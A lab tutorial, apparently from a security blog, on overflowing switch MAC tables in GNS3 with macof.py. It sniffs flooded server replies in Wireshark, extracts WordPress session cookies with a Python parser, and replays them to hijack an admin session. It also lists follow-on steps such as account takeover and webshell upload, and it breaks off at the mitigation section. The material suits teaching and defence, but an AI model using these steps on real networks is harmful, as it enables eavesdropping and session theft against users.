The original article is <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/" title="How to run a CAM table overflow attack in GNS3">available here</a>.</p>
<p>In this article I detailed a classical switch implementation as follows:</p>
<ol>
<li>
<p>The switch receives an incoming frame on some port,</p>
</li>
<li>
<p>The switch then checks if the source <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address is already stored in its
<abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table.</p>
<ul>
<li>If it isn’t and there is a free slot, it records this new <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address
associated to its incoming port.</li>
<li>If the address is already present but associated to another port, it
updates the record with the new port.</li>
<li>In all cases this is also the occasion to reset the aging timer
associated to this entry.</li>
</ul>
</li>
<li>
<p>The switch then checks if the destination <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address is already stored in
the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table.</p>
<ul>
<li>If it is, then this is all good and the switch outputs the packet on
the interface associated to the matching <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr> table entry.</li>
<li>If it isn’t, the switch outputs the packet on all interfaces except the
incoming one (all interfaces belonging to the same <span class="caps">VLAN</span> + the trunk
ports as long as this <span class="caps">VLAN</span> is not pruned).</li>
</ul>
</li>
<li>
<p>As a separate process, the switch regularly deletes the entries whose
aging timer exceeded a given threshold (usually at least several minutes
on real gear, hardcoded to 30 seconds in the case of the Dynamips emulated
<span class="caps">NM</span>-<span class="caps">16ESW</span> router extension).</p>
</li>
</ol>
<p>This works well… until the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table gets full.
New entries for previously unseen source addresses can then no longer be
added to the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table.
When incoming frames are addressed to one of these unlearned addresses, the
switch has no choice but to fall back on the second bullet above and flood
the frames on all ports.</p>
<p><abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables are made large enough to prevent this situation from happening
under normal circumstances (usually 1000 or 2000 entries for desktop switches
and 5000 to 16000 entries for common enterprise ones).
However, a malicious user may send a large number of frames, each bearing a
different source <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address, which will artificially fill up the switches’ <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
address tables, thus forcing them into this fall-back behavior.</p>
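<p>To make the learning algorithm and its fall-back behavior concrete, here is a small simulation of one <span class="caps">VLAN</span>’s <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table. It is an added example, not part of the original post nor of <code>macof.py</code>: the <code>Switch</code> class implements the steps listed above (with the <span class="caps">NM</span>-<span class="caps">16ESW</span>’s 8192-entry, 30-second values as defaults) and <code>run_scenario()</code> replays the lab: <em>R1</em> learned first, an attacker flooding 8192 distinct source addresses, then a <em>User_1</em>/<em>R1</em> exchange, then the same exchange after the bogus entries aged out. The port names and <em>User_1</em>’s address are hypothetical, and the flood uses sequential source addresses rather than the random ones <code>macof.py</code> generates.</p>

```python
"""Toy learning switch: MAC table learning, flooding on unknown destinations,
aging, and what an overflow does to a later User_1 <-> R1 exchange."""

FLOOD = "flood"                    # pseudo egress: every port except the ingress one
BROADCAST = "ff:ff:ff:ff:ff:ff"


class Switch:
    """One VLAN's MAC address table, following the steps listed above.

    Defaults match the lab's Dynamips NM-16ESW: 8192 entries, 30 s aging.
    """

    def __init__(self, capacity=8192, aging_time=30.0):
        self.capacity = capacity
        self.aging_time = aging_time
        self.table = {}            # mac -> [port, last_seen]
        self.last_sweep = 0.0
        self.flooded = 0           # frames that had to be flooded

    def _sweep(self, now):
        """Aging process: runs periodically (at most once per simulated second here)."""
        if now - self.last_sweep < 1.0:
            return
        self.last_sweep = now
        for mac in [m for m, (_, seen) in self.table.items() if now - seen > self.aging_time]:
            del self.table[mac]

    def _learn(self, mac, port, now):
        entry = self.table.get(mac)
        if entry is not None:                   # known address: refresh port and aging timer
            entry[0], entry[1] = port, now
        elif len(self.table) < self.capacity:   # new address and a free slot: record it
            self.table[mac] = [port, now]
        # new address but table full: not learned, which is exactly what the attacker wants

    def forward(self, src, dst, in_port, now):
        """Process one frame and return its egress port, or FLOOD."""
        self._sweep(now)
        self._learn(src, in_port, now)
        entry = self.table.get(dst)
        if entry is not None:
            return entry[0]
        self.flooded += 1
        return FLOOD


R1_MAC = "c2:01:06:8b:00:00"       # R1, the one entry in ESW2's table above
USER1_MAC = "00:50:79:66:68:01"    # hypothetical address for User_1
R1_PORT, ATTACKER_PORT, USER1_PORT = "Fa1/0", "Fa1/1", "Fa1/2"   # hypothetical port layout


def flood_sources(count):
    """Attacker-chosen source addresses. macof.py randomises them; sequential
    locally-administered addresses keep this run deterministic."""
    for i in range(count):
        yield "02:00:00:%02x:%02x:%02x" % ((i >> 16) & 0xFF, (i >> 8) & 0xFF, i & 0xFF)


def run_scenario(capacity=8192, aging_time=30.0, pps=3000):
    sw = Switch(capacity, aging_time)
    t = 0.0
    # R1 is learned before the attack (in practice it never stops talking).
    sw.forward(R1_MAC, BROADCAST, R1_PORT, t)
    # The attack: `capacity` frames with distinct sources at the rate used with macof.py above.
    for src in flood_sources(capacity):
        t += 1.0 / pps
        sw.forward(src, BROADCAST, ATTACKER_PORT, t)
    result = {"table_full": len(sw.table) == capacity}
    # User_1 -> R1: R1's entry is still there, so the frame is unicast to R1 only,
    # but User_1's own address cannot be learned because the table is full.
    result["request_out"] = sw.forward(USER1_MAC, R1_MAC, USER1_PORT, t)
    result["user1_learned"] = USER1_MAC in sw.table
    # R1 -> User_1 (the server's reply): destination unknown, so it is flooded and the attacker sees it.
    result["reply_out"] = sw.forward(R1_MAC, USER1_MAC, R1_PORT, t)
    # Stop the attack and wait longer than the aging time: the bogus entries expire
    # and the next exchange is learned and switched normally again.
    t += aging_time + 1.0
    sw.forward(R1_MAC, BROADCAST, R1_PORT, t)
    sw.forward(USER1_MAC, R1_MAC, USER1_PORT, t)
    result["reply_out_after_aging"] = sw.forward(R1_MAC, USER1_MAC, R1_PORT, t)
    result["entries_after_aging"] = len(sw.table)
    return result


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

<p>Running it shows the asymmetry discussed later in this post: the request from <em>User_1</em> is still switched to <em>R1</em>’s port only, while the reply toward the unlearned <em>User_1</em> address is flooded, and the situation corrects itself once the attack stops for longer than the aging time.</p>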
<p>This attack, and the way to prevent it, is what we will now see in detail.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="MAC table overflow topoloy" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/topology.png"/></a></span></p>
<p>This article relies on the same topology as the rest of the series.
If you didn’t read the <a href="/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/" title="Practical network layer 2 exploitation: introduction">introduction post</a>, do it now.</p>
<p>For this lab we will use the <em>Users</em> and <em>Servers</em> <span class="caps">VLAN</span>.
The <em>Admins</em> <span class="caps">VLAN</span> will not be involved.</p>
<p>As for the tools, we will use <a href="https://github.com/WhiteWinterWolf/macof.py" rel="external" title="macof.py (GitHub)">macof.py</a>, <a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a> and a browser with
a plugin allowing cookies to be edited (here I will use <a href="https://www.mozilla.org/gd/firefox/" rel="external" title="Firefox project homepage">Firefox</a> with
the <a href="https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/" rel="external" title="Cookies Manager+ (Firefox Add-ons)">Cookies Manager+</a> plugin).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Internet access, allowing missing tools to be downloaded on your
<em>Attacker</em> node, can be provided in <span class="caps">GNS3</span> by adding a <em>Cloud</em> node to your topology and
temporarily connecting the <em>Attacker</em> to it.</p>
</div>
<h3 id="initial-state"><a class="toclink" href="#initial-state">Initial state</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Initially, <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables only contain the minimum information allowing
the switches to forward their frames correctly.
Given the size of our lab network, this is not much information:</p>
<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> mac-address-table count
<span class="go">NM Slot: 1</span>
<span class="go">--------------</span>
<span class="hll"><span class="go">Dynamic Address Count: 1</span>
</span><span class="go">Secure Address (User-defined) Count: 0</span>
<span class="go">Static Address (User-defined) Count: 0</span>
<span class="go">System Self Address Count: 1</span>
<span class="go">Total MAC addresses: 2</span>
<span class="hll"><span class="go">Maximum MAC addresses: 8192</span>
</span><span class="gp">ESW2#</span><span class="k">show</span> mac-address-table dynamic
<span class="go">Non-static Address Table:</span>
<span class="go">Destination Address Address Type VLAN Destination Port</span>
<span class="go">------------------- ------------ ---- --------------------</span>
<span class="hll"><span class="go">c201.068b.0000 Dynamic 3 FastEthernet1/0</span>
</span>
<span class="gp">ESW2#</span>
</pre></div>
<p>Here <em><span class="caps">ESW2</span></em> only has one entry: the <em>R1</em> router.
Also note that the table may contain up to a maximum of 8192 <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> addresses.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>If the counter is zero, generate some activity on the network,
for instance by pinging <em>Server_1</em> from the <em>Attacker</em> machine.</p>
<p>Moreover, depending on the device and <span class="caps">IOS</span> version, <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address table information may be
available under either <code>show mac-address-table</code> or <code>show mac address-table</code>.</p>
</div>
<h3 id="the-attack-stages"><a class="toclink" href="#the-attack-stages">The attack stages</a></h3>
<h4 id="mac-table-overflow"><a class="toclink" href="#mac-table-overflow"><abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The traditional tool for the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table overflow attack is <code>macof</code> from the
<a href="https://www.monkey.org/~dugsong/dsniff/" rel="external" title="dsniff project homepage">dsniff</a> project.
However this tool is old, seemingly unmaintained (last update in 2000) and I
find it quite inefficient for the task.</p>
<p>I therefore decided to build my own alternative, <code>macof.py</code>, <a href="https://github.com/WhiteWinterWolf/macof.py" rel="external" title="macof.py (GitHub)">available here</a>.</p>
<p>Usually you should be able to run <code>./macof.py</code> without any parameter to use the
default settings.
However, this attack is quite intense, especially on home virtual labs, so to
create the best conditions you may need to adapt the default settings a little:</p>
<ul>
<li>
<p>We have seen previously that our router-based switch has a <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address
table limited to 8192 entries; we will therefore not bother with the default
of creating 20000 <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> entries but limit ourselves to this number.</p>
</li>
<li>
<p>We will also slow down packet sending: first 3000 packets per
second to fill the switches’ <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> tables, then around one packet per millisecond
to keep the bogus entries fresh.</p>
<p>We won’t be able to slow the refresh rate much in the virtual lab compared to
real gear, because the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address aging time in Dynamips’ <span class="caps">NM</span>-<span class="caps">16ESW</span>
implementation is hardcoded to a very low value (30 seconds, while the
default on real gear is 5 minutes).</p>
</li>
</ul>
<p>Here is the command I will use:</p>
<div class="codehilite"><pre><span class="gp">root@kali:~#</span> ./macof.py -c <span class="m">8192</span> -f <span class="m">3000</span> -w 1
<span class="go">macof.py <https://www.whitewinterwolf.com/projects/></span>
<span class="go">* Pre-generating 8192 packets...</span>
<span class="go">* Sending 3000 packets per second, looping 1 times.</span>
<span class="go">Actual: 8192 packets (540672 bytes) sent in 2.73 seconds</span>
<span class="go">Rated: 198020.1 Bps, 1.58 Mbps, 3000.30 pps</span>
<span class="go">Flows: 8192 flows, 3000.30 fps, 8192 flow packets, 0 non-flow</span>
<span class="go">Statistics for network device: eth0</span>
<span class="go"> Successful packets: 8192</span>
<span class="go"> Failed packets: 0</span>
<span class="go"> Truncated packets: 0</span>
<span class="go"> Retried packets (ENOBUFS): 0</span>
<span class="go"> Retried packets (EAGAIN): 0</span>
<span class="go">* Sending one packet every 1 milliseconds, press Ctrl+C to terminate.</span>
</pre></div>
<p>Wait a few seconds; the switches’ <abbr title="Content Addressable Memory"><span class="caps">CAM</span></abbr> tables should now be filled up:</p>
<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> mac-address-table count
<span class="go">NM Slot: 1</span>
<span class="go">--------------</span>
<span class="go">Dynamic Address Count: 8188</span>
<span class="go">Secure Address (User-defined) Count: 0</span>
<span class="go">Static Address (User-defined) Count: 0</span>
<span class="go">System Self Address Count: 1</span>
<span class="go">Total MAC addresses: 8189</span>
<span class="go">Maximum MAC addresses: 8192</span>
<span class="gp">ESW2#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>In practice the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table size is capped at 8189 instead of 8192.
This is an implementation quirk of Dynamips’ <span class="caps">NM</span>-<span class="caps">16ESW</span> module with no consequence.</p>
</div>
<p>As the attacker, you could also take advantage of the Spanning-Tree protocol
to redesign the topology to make the flooding and data interception even more
efficient.
More information can be found in the <a href="/posts/2017/10/16/spanning-tree-protocol-exploitation/#stp-topology-change" title="STP topology change attack">previous post</a> of this series.</p>
<h4 id="eavesdropping"><a class="toclink" href="#eavesdropping">Eavesdropping</a></h4>
<p>It is now time to fire up Wireshark.</p>
<p>Before starting the capture, you may want to specify a capture filter:</p>
<ul>
<li>
<p>To ignore the frames crafted to flood the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> tables.</p>
<p>By default the packets crafted by <code>macof.py</code> use the broadcast <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address as
destination; to ignore them, use the expression
<code>not ether host ff:ff:ff:ff:ff:ff</code></p>
</li>
<li>
<p>To focus on <span class="caps">HTTP</span> packets.</p>
<p>This is mainly for the lab purposes, as this will make working with
Wireshark easier, particularly on home virtualized environments.
To do this we add <code>and tcp port http</code> to the above expression.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>A lot of processing goes into Wireshark’s live packet analysis.</p>
<p>For the sake of the lab, we chose to focus on the packets which we
already know to be the most interesting.
If processing power becomes an issue in real-life situations (Raspberry
anyone?), it is common to dissociate:</p>
<ul>
<li>The data collection phase, building large <em>.pcap</em> files storing
all sniffed data in raw form with little to no discrimination.</li>
<li>The data analysis phase, which may occur at a later time and on a
different machine.</li>
</ul>
</div>
</li>
</ul>
<p>This gives the following capture filter:
<code>not ether host ff:ff:ff:ff:ff:ff and tcp port http</code>:</p>
<p><span class="lb-small"><a href="#ws_capture_filter.png" id="ws_capture_filter.png-thumb" title="Click to enlarge"><img alt="Wireshark capture filter" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ws_capture_filter.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Don’t confuse Wireshark’s <em>capture</em> and <em>display</em> filters:</p>
<ul>
<li>
<p>The <em>capture</em> filter allows selecting the data to capture at an early
stage.
Data not matching the filter is ignored, freeing processing time for
more relevant data which, otherwise, might be lost, especially under
high load or activity.</p>
</li>
<li>
<p>The <em>display</em> filter, as its name implies, only filters the data
displayed in the <span class="caps">GUI</span>.
Data not matching the filter is still collected and analyzed by the
various Wireshark dissectors, so this filter has no beneficial impact on
Wireshark’s performance.</p>
</li>
</ul>
</div>
<p>Start the <em>User_1</em> host and access <em>Server_1</em>’s home page: <em>Server_1</em>’s replies
should appear in the Wireshark window:</p>
<p><span class="lb-small"><a href="#ws_interception.png" id="ws_interception.png-thumb" title="Click to enlarge"><img alt="Wireshark sniffed traffic" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ws_interception.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>If you don’t capture anything and the <em>User_1</em> host was already running,
close its Firefox for more than 30 seconds then try again: Firefox may have
background network activity (checking for updates and sending usage
statistics) that registers <em>User_1</em>’s <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address in the switches’ <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables.</p>
<p>For the same reason, in real life this attack is most
efficient after a long period of inactivity during which the computers were either
turned off or in stand-by mode, typically the beginning of the work day
and, to a lesser extent, after the lunch break.</p>
</div>
<p>As you can see in the screenshot, we have only one side of the communication:
every captured packet goes from the server (<em>source = 192.168.3.100</em>) to the client
(<em>destination = 192.168.1.101</em>); we did not capture any packet going the other
way around.</p>
<p>This is normal and expected, albeit largely ignored by those who limit
themselves to a theoretical approach of security and think that <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> table
overflows somehow magically <em>“turn a switch into a hub”</em> or make it
<em>“fail open in repeating mode”</em>, as it is often described.</p>
<p>This depends on the algorithm implemented in the switch, but on sane and modern
devices the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> flooding should not be able to overwrite already existing and
legitimate <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> entries (except following an inactivity period longer than the
configured maximum aging-timer, as usual).</p>
<p>Under normal circumstances the default router’s address is always known to the
switches, as nearly all activity on the network involves it.
It is one of the first addresses learned when the switch is started and it is
permanently refreshed.
The addresses that are added to and removed from the switch throughout the day are
those of the end nodes, here the users’ workstations.</p>
<p>By filling the switches <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables, we prevented the switches from
learning the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address of the <em>User_1</em> host, however the address of the
default router <em>R1</em> was already known and will remain known.
The overflow won’t change anything to that.</p>
<p>Because of this:</p>
<ul>
<li>
<p>Frames going from <em>User_1</em> to <em>R1</em> (and then <em>Server_1</em>) are correctly
forwarded thanks to <em>R1</em>’s <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address being present in the switches’ <abbr title="Media Access Control"><span class="caps">MAC</span></abbr>
address tables.</p>
</li>
<li>
<p>When reply frames sent by <em>Server_1</em> come through <em>R1</em> and try to reach
<em>User_1</em>, the <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address of the <em>User_1</em> host is missing from the switches’
<abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address tables due to our attack, so the switches fall back to
flooding them.</p>
</li>
</ul>
<p>We can therefore see that this attack has two main limitations:</p>
<ul>
<li>
<p>We may have access to only one side of the communication.</p>
</li>
<li>
<p>This is an eavesdropping attack, not a man-in-the-middle attack: we receive
the server’s answers at the same time as the legitimate destination; this attack does
not provide an easy way to alter the server’s answers.</p>
</li>
</ul>
<p>Nevertheless, we will now see an example of how this attack can still be put to use.</p>
<h4 id="session-stealing"><a class="toclink" href="#session-stealing">Session stealing</a></h4>
<p>Go back to <em>User_1</em> and access a management page of the <em>Server_1</em> web
application.
On my side, I will access a WordPress administration page (for those using the
same appliance as me, click on the Bitnami logo in the bottom-right corner to
get a listing of default credentials and links to the available management pages).</p>
<p>In Wireshark, find one of the packets corresponding to the server’s answer to
the user’s successful authentication, then right-click on it > <em>Follow</em> >
<em><span class="caps">TCP</span> Stream</em>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>You must locate the server’s answer to the user’s authentication, as it is
at this moment that the server’s reply contains the cookie values.
Other messages from the server won’t contain them, and as you don’t have
access to the data sent by the client you cannot fetch this information
from there either.</p>
<p>In case of doubt, don’t hesitate to make a few attempts by logging the user off
and on again, noting each time the number of the last packet
captured by Wireshark.</p>
<p>In the real world, you may have dozens of users opening new sessions after an
inactivity period; being able to capture just a few of them might be enough.</p>
</div>
<p>You should obtain the full server answer to the user’s login process.
While you don’t have the user’s password, you still have access to the user’s cookies:</p>
<p><span class="lb-small"><a href="#ws_stream.png" id="ws_stream.png-thumb" title="Click to enlarge"><img alt="Wireshark TCP stream" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ws_stream.png"/></a></span></p>
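<p>The capture filter chosen above and the cookie extraction just performed in Wireshark can be expressed in a few lines of plain Python, which also makes it clear why only the server’s side of the exchange is usable. The following is an added example, not code from this post, from <code>macof.py</code> or from Wireshark: it decodes Ethernet/IPv4/<span class="caps">TCP</span> headers with <code>struct</code>, applies the equivalent of <code>not ether host ff:ff:ff:ff:ff:ff and tcp port http</code>, and collects the <em>Set-Cookie</em> headers of server replies. The sample frames are constructed inline: <em>R1</em>’s <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address and the <em>192.168.3.100</em> / <em>192.168.1.101</em> addresses come from the lab, while <em>User_1</em>’s <abbr title="Media Access Control"><span class="caps">MAC</span></abbr> address, the client port and the cookie names and values are made up.</p>

```python
import struct

BROADCAST_MAC = b"\xff" * 6
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP, IPPROTO_UDP = 6, 17
HTTP_PORT = 80


def parse_frame(frame):
    """Decode Ethernet II / IPv4 / TCP headers into a dict; None for anything else."""
    if len(frame) < 14 + 20 + 20:
        return None
    dst, src = frame[0:6], frame[6:12]
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                     # IPv4 header length in bytes
    if ip[9] != IPPROTO_TCP or len(ip) < ihl + 20:
        return None
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[0:4])
    data_offset = (tcp[12] >> 4) * 4             # TCP header length in bytes
    return {
        "src_mac": src.hex(":"), "dst_mac": dst.hex(":"),
        "src_ip": ".".join(map(str, ip[12:16])), "dst_ip": ".".join(map(str, ip[16:20])),
        "sport": sport, "dport": dport, "payload": tcp[data_offset:],
    }


def capture_filter(frame):
    """Equivalent of the Wireshark capture filter
    'not ether host ff:ff:ff:ff:ff:ff and tcp port http'."""
    if BROADCAST_MAC in (frame[0:6], frame[6:12]):   # 'ether host' matches either address
        return False
    p = parse_frame(frame)
    return p is not None and HTTP_PORT in (p["sport"], p["dport"])


def set_cookies(http_response):
    """name -> value for every Set-Cookie header of a raw HTTP response."""
    head = http_response.split(b"\r\n\r\n", 1)[0]
    cookies = {}
    for line in head.split(b"\r\n")[1:]:            # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"set-cookie":
            pair = value.strip().split(b";", 1)[0]   # drop path=, httponly, ... attributes
            cname, _, cvalue = pair.partition(b"=")
            cookies[cname.decode("latin-1")] = cvalue.decode("latin-1")
    return cookies


def harvest_cookies(frames):
    """Keep what the capture filter keeps, then only server replies (the one
    direction the overflow lets us see) and collect every cookie they set."""
    found = {}
    for frame in frames:
        if not capture_filter(frame):
            continue
        p = parse_frame(frame)
        if p["sport"] == HTTP_PORT and p["payload"].startswith(b"HTTP/"):
            found.update(set_cookies(p["payload"]))
    return found


# --- constructed sample traffic (checksums left at zero: we only parse) ---------------
def build_frame(src_mac, dst_mac, src_ip, dst_ip, proto, l4):
    ip_header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                            bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return dst_mac + src_mac + struct.pack("!H", ETHERTYPE_IPV4) + ip_header + l4


def tcp_segment(sport, dport, payload):
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload


R1_MAC = bytes.fromhex("c201068b0000")        # R1, from ESW2's MAC table above
USER1_MAC = bytes.fromhex("005079666801")     # hypothetical User_1 address
FLOOD_SRC = bytes.fromhex("020a0b0c0d0e")     # stands in for one of macof.py's random sources
SERVER_IP, USER1_IP = "192.168.3.100", "192.168.1.101"
LOGIN_REPLY = (b"HTTP/1.1 302 Found\r\n"
               b"Set-Cookie: wordpress_c0ffee=admin%7C1510000000%7Ccafebabe; path=/wp-admin; httponly\r\n"
               b"Set-Cookie: wordpress_logged_in_c0ffee=admin%7C1510000000%7Cdeadbeef; path=/; httponly\r\n"
               b"Location: http://192.168.3.100/wp-admin/\r\n\r\n")
SAMPLE_FRAMES = [
    # a flood frame: broadcast destination, bogus source; the capture filter drops it
    build_frame(FLOOD_SRC, BROADCAST_MAC, "10.0.0.1", "10.0.0.2", IPPROTO_TCP, tcp_segment(1024, 1025, b"")),
    # a UDP datagram (think DNS): not TCP, dropped
    build_frame(USER1_MAC, R1_MAC, USER1_IP, "192.168.1.1", IPPROTO_UDP, b"\x00" * 8),
    # User_1's login request: passes the filter, but the switch unicasts it to R1, so we never see it
    build_frame(USER1_MAC, R1_MAC, USER1_IP, SERVER_IP, IPPROTO_TCP,
                tcp_segment(51234, HTTP_PORT, b"POST /wp-login.php HTTP/1.1\r\nHost: 192.168.3.100\r\n\r\n")),
    # Server_1's reply, relayed by R1 and flooded by the switch: this is where the cookies are
    build_frame(R1_MAC, USER1_MAC, SERVER_IP, USER1_IP, IPPROTO_TCP, tcp_segment(HTTP_PORT, 51234, LOGIN_REPLY)),
]

if __name__ == "__main__":
    for name, value in harvest_cookies(SAMPLE_FRAMES).items():
        print(f"{name}={value}")
```

<p>Note that the client’s request would pass the capture filter too; it is simply never delivered to the attacker’s port, so the harvesting step only looks at segments coming from port 80. On a real capture the same logic would need <span class="caps">TCP</span> stream reassembly, since a login reply can span several segments.</p>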
<p>Still on the <em>Attacker</em> machine, fire up a browser and go to <em>Server_1</em>’s
authentication page (<em>http://192.168.3.100/wp-admin</em> in my case): you are not
authenticated (yet!).</p>
<p>Edit your browser’s cookies and manually add the previously captured cookies as
new cookies.
As mentioned above, on my side I use Cookies Manager+ for this task:</p>
<p><span class="lb-small"><a href="#ff_forge_cookies.png" id="ff_forge_cookies.png-thumb" title="Click to enlarge"><img alt="Forging the cookies on Firefox" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ff_forge_cookies.png"/></a></span></p>
<p>I added two new cookies, prefixed <em>wordpress_…</em> and <em>wordpress_logged_in_…</em>:</p>
<p><span class="lb-small"><a href="#ff_cookies.png" id="ff_cookies.png-thumb" title="Click to enlarge"><img alt="New cookies" src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/ff_cookies.png"/></a></span></p>
<p>Try again to access the authentication <span class="caps">URL</span>: <em>“Welcome!”</em>, you are now
granted access to the administration interface!</p>
<p><span class="lb-small"><a href="#pwned.png" id="pwned.png-thumb" title="Click to enlarge"><img alt="Pwned." src="https://www.whitewinterwolf.com/posts/2017/10/25/mac-address-table-overflow/pwned.png"/></a></span></p>
<h4 id="next-steps"><a class="toclink" href="#next-steps">Next steps</a></h4>
<p>As an attacker, there are several things that you can now do, depending
on what you want to achieve:</p>
<ul>
<li>
<p>Maintain your access:</p>
<ul>
<li>
<p>In its current shape, this access will be available only for as long as
the legitimate user does not close the session by clicking on a
<em>Logout</em> link.
If the user closes his browser without closing the session then you
have this session all for yourself.</p>
</li>
<li>
<p>To steal the account, you can edit the user’s settings, change the email
address to an address you control and set a new password of your choosing.</p>
<p>Changing the password here is easy as the previous password is not
asked for when setting a new one, but if it were, simply use the
“Lost your password?” link to reset it after having changed the email address.</p>
<p>In this scenario the attacker usually doesn’t nitpick but changes all
user information (including credit card and phone numbers, postal
addresses, security questions, backup accounts, etc.).
Such information may indeed be used by support teams to check the user’s
identity in case of a stolen account claim; altering it may prevent
such recovery from working, as demonstrated in the
<a href="https://medium.com/@N/how-i-lost-my-50-000-twitter-username-24eb09e026dd" rel="external" title="How I Lost My $50,000 Twitter Username (Medium)">How I Lost My $50,000 Twitter Username</a> case<sup id="fnref-n_is_stolen"><a class="footnote-ref" href="#fn-n_is_stolen">1</a></sup>.</p>
</li>
<li>
<p>More sneakily, if we are lucky enough to have administrative privileges,
it may be possible to create new accounts or modify the privileges or
credentials of existing accounts (in particular unused ones).</p>
</li>
</ul>
</li>
<li>
<p>Attack the server:</p>
<ul>
<li>
<p>Is there any feature allowing to upload files, if yes does one of them
open the possibility to upload a webshell, in one way or another?</p>
</li>
<li>
<p>Is there any feature allowing to execute a command on the host, such
as maintenance tasks?</p>
</li>
<li>
<p>Is there any feature allowing to input server-side scripting code?</p>
</li>
</ul>
<p>More generally, once the attacker managed to get access to a valid
account on a system, the attack surface usually becomes much wider.</p>
</li>
<li>
<p>Attack other users:</p>
<ul>
<li>
<p>Create new content or modify existing content to include malicious code
and infect other users viewing modified content.</p>
</li>
<li>
<p>Use the newly gained abilities as part of a social engineering attack,
impersonating the legitimate user toward third parties.</p>
</li>
</ul>
</li>
</ul>
<p>Of course, none of these suggestions is exclusive and this list is not exhaustive.
A determined attacker will most likely engage through various ways and channels
simultaneously to get the most impact, both technically and psychologically.</p>
<h3 id="mitigation"><a class="toclink" href="#mitigation">Mitigation</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The mitigation for this attack is to set a limit on the number of devices
expected per port.
